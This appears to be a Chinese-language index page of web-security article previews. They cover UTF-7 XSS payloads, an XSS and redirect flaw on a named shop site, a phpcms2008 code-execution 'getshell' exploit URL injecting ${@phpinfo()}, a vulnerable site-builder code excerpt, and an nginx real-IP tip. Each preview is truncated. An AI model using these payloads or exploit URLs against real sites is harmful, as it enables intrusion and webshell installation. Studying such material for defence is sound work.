-
UTF-7 XSS 常见利用方法
1、基本样式 <script>alert(31337)</script> +ADw-script+AD4-alert(31337)+ADw-/script+AD4- <script>alert(docum...
-
美时空分站XSS与网址跳转漏洞
Author:Insight-labs(Web Security Group)1.XSShttp://shop.wanmei.com/search.php?encode=YToyOntzOjg6ImtleXdvcmRzIjtzOjMxOiI...
-
phpcms2008 代码执行 批量 getshell EXP
测试如下:http://www.xx.com/yp/product.php?pagesize=${@phpinfo()}测试结果:http://www.cnqiyou.com/yp/product.php?pagesize=${@phpin...
-
行业之星自助建站系统v0.87漏洞
//template_edit.phpfunction load_library($curr_template, $lib_name){ $lib_name = str_replace("0xa", '', $li...
-
nginx 如何显示真实ip
nginx做反向代理显示在后台访问的真实ip总是显示127.0.0.1只要添加如下内容: proxy_set_header Host $host; proxy_set_header X-Forwarded-For $remote_addr;...
